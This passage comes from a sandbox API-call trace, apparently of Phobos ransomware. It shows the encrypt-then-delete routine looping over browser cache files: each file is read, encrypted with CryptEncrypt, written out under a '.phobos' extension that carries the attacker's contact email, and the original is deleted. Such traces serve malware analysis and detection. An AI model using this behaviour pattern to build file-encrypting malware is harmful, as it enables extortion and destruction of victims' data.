(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\benefits-1[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\benefits-1[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0187.579] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0187.579] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0187.579] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1fdaf, lpOverlapped=0x0) returned 1 [0187.581] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1fdb0, dwBufLen=0x1fdb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1fdb0) returned 1 [0187.582] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1fdb0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1fdb0, lpOverlapped=0x0) returned 1 [0187.585] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0187.585] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0187.585] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0187.585] CryptDestroyKey (hKey=0xa327e8) returned 1 [0187.585] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0187.585] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0187.585] CloseHandle (hObject=0x160) returned 1 [0187.585] CloseHandle (hObject=0x130) returned 1 [0187.586] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\benefits-1[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\benefits-1[1].jpg")) returned 1 [0187.587] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0187.587] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chartbeat[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chartbeat[1].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0187.588] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=33496) returned 1 [0187.588] CloseHandle (hObject=0x130) returned 1 [0187.588] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chartbeat[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chartbeat[1].js")) returned 0x2020 [0187.588] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chartbeat[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chartbeat[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0187.588] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chartbeat[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chartbeat[1].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0187.588] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0187.588] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0187.588] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chartbeat[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chartbeat[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0187.588] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0187.589] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0187.589] ReadFile (in: hFile=0x130, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x82d8, lpOverlapped=0x0) returned 1 [0187.806] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x82e0, dwBufLen=0x82e0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x82e0) returned 1 [0187.807] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x82e0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x82e0, lpOverlapped=0x0) returned 1 [0187.808] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0187.808] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0187.808] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0187.808] CryptDestroyKey (hKey=0xa327e8) returned 1 [0187.808] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0187.809] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0187.809] CloseHandle (hObject=0x130) returned 1 [0187.809] CloseHandle (hObject=0x160) returned 1 [0187.809] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chartbeat[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chartbeat[1].js")) returned 1 [0187.810] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0187.810] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chrome-installer.min[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chrome-installer.min[1].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0187.811] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=245536) returned 1 [0187.811] CloseHandle (hObject=0x160) returned 1 [0187.811] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chrome-installer.min[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chrome-installer.min[1].js")) returned 0x2020 [0187.811] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chrome-installer.min[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chrome-installer.min[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0187.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chrome-installer.min[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chrome-installer.min[1].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0187.811] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0187.811] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0187.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chrome-installer.min[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chrome-installer.min[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0187.820] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0187.820] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0187.820] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3bf20, lpOverlapped=0x0) returned 1 [0187.956] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3bf30, dwBufLen=0x3bf30 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3bf30) returned 1 [0187.958] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3bf30, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3bf30, lpOverlapped=0x0) returned 1 [0187.969] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0187.969] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0187.969] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0187.969] CryptDestroyKey (hKey=0xa32c28) returned 1 [0187.969] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x112, lpOverlapped=0x0) returned 1 [0187.969] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0187.969] CloseHandle (hObject=0x160) returned 1 [0187.969] CloseHandle (hObject=0x130) returned 1 [0187.969] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chrome-installer.min[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chrome-installer.min[1].js")) returned 1 [0187.971] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0187.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\close-icon[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\close-icon[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0187.972] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=317) returned 1 [0187.972] CloseHandle (hObject=0x130) returned 1 [0187.972] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\close-icon[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\close-icon[1].png")) returned 0x2020 [0187.973] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\close-icon[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\close-icon[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0187.973] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\close-icon[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\close-icon[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0187.973] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0187.973] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0187.973] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\close-icon[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\close-icon[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0187.973] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0187.973] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0187.973] ReadFile (in: hFile=0x130, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x13d, lpOverlapped=0x0) returned 1 [0187.975] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x140, dwBufLen=0x140 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x140) returned 1 [0187.975] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x140, lpOverlapped=0x0) returned 1 [0187.976] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0187.976] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0187.976] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0187.976] CryptDestroyKey (hKey=0xa32c28) returned 1 [0187.976] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0187.976] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0187.976] CloseHandle (hObject=0x130) returned 1 [0187.976] CloseHandle (hObject=0x160) returned 1 [0187.976] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\close-icon[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\close-icon[1].png")) returned 1 [0187.977] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0187.977] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\css[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\css[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0187.978] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=158130) returned 1 [0187.978] CloseHandle (hObject=0x160) returned 1 [0187.978] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\css[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\css[1].txt")) returned 0x2020 [0187.978] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\css[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\css[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0187.978] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\css[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\css[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0187.978] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0187.978] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0187.978] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\css[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\css[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0187.979] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0187.979] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0187.979] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x269b2, lpOverlapped=0x0) returned 1 [0188.607] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x269c0, dwBufLen=0x269c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x269c0) returned 1 [0188.609] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x269c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x269c0, lpOverlapped=0x0) returned 1 [0188.614] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0188.614] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0188.614] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0188.615] CryptDestroyKey (hKey=0xa32de8) returned 1 [0188.620] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0188.620] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0188.620] CloseHandle (hObject=0x160) returned 1 [0188.620] CloseHandle (hObject=0x130) returned 1 [0188.620] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\css[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\css[1].txt")) returned 1 [0188.622] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0188.622] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\msn[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\msn[1].htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, 